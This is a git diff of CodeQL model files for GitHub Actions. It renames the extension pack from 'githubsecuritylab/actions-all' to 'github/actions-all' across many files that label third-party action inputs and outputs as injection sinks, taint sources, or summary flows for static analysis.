@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index a22fce01c45..6d7d368c781 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 74a5c7d592c..9b0f078d874 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e78dfb3b073..dabec4e8d21 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 29dac5cffea..2db040a0709 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index f2331633485..e8d4aa790a6 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index e492f601278..8fde3e0c110 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index a821b049232..e9b04f2806f 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 4f9f887caf1..386baaf2f95 100644 
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 365f3ac98f8..d9c7d33c86f 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index f42e8465533..016a8ebc8cf 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index e21b5224166..d358aa23893 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] 
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index 6c4a5931b98..f37bcbd6297 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index c7e89697afb..05acda9aac9 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index aa849603836..4b0c810d230 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ae869b6b531..acdf3ead4a4 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] 
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index 9f5801b79c0..b138d59c57e 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index a4a473b8efd..63b236f32ad 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 10a03e4d186..0c6debc5d5e 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index 9af82b985f3..b72bd69e625 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 3b779d0b86d..fec2376377e 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 6ad087730e4..3201ac370b4 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index fa9c1958352..59c6e39515e 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 6bfaffb2bba..06371eebae2 100644 
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index 03fa8beaf0b..a12a478d9bd 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index a4ccaac2d2e..28357d5f468 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 7c32705dde5..cfdff1898ae 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] 
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 902483f4399..f4ad5f7292b 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index be86a330b97..872b4e243d7 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 0a6f7c34722..bd53ab3d65a 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index 613b3e0fc59..db650eeb7c7 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 489d47ac71e..34d63f31ca8 100644 
--- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index 4a98ecd4af1..02d6d804699 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 57dc40ef6b8..46fb5fd7dd6 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 3b92f667ae9..0aab8b94632 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index da8b02312ea..62bb26ba1ff 100644 
--- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index c06d13301d2..dfacbbc14f4 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 61935c36f7d..b258b619b6c 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 89f61cedc42..76b0c1d7d32 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 1aabfc23fc4..587519e948b 100644 
--- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index d55fdbc3ea9..58cbf9cc742 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index d01ac86d317..cc39018b9b1 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index bab76cbe27f..a0b5bc0dee4 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] 
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index 02ac5032c79..89d91208ad4 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index 0c484d44549..65a4cc60652 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index c088c7a644e..d82962aa096 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index 5b22ac1f5fe..32622271d6a 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] 
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index 3329a255e6f..8dbc5ee2ade 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 14a1cdeed86..0bbd6364b5e 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml
index 49931d93f88..6d6ec4a393e 100644
--- a/ql/lib/ext/sergeysova_jq-action.model.yml
+++ b/ql/lib/ext/sergeysova_jq-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
index 37d0014bcbb..78737c6bb8b 100644
--- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
+++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
index 9058c9fb984..64d5aac33ab 100644
--- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
index 713c5c61cea..c921df3fa7d 100644
--- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
index 40b02283152..623483db63e 100644
--- a/ql/lib/ext/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
index c08505f9747..5184c3c4c48 100644
--- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
index 6305fd33960..c898d41c838 100644
--- a/ql/lib/ext/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
index 73988096818..d7c874c7787 100644
--- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
index ee9a0dbb32a..398dfb5c766 100644
--- a/ql/lib/ext/tibdex_backport.model.yml
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
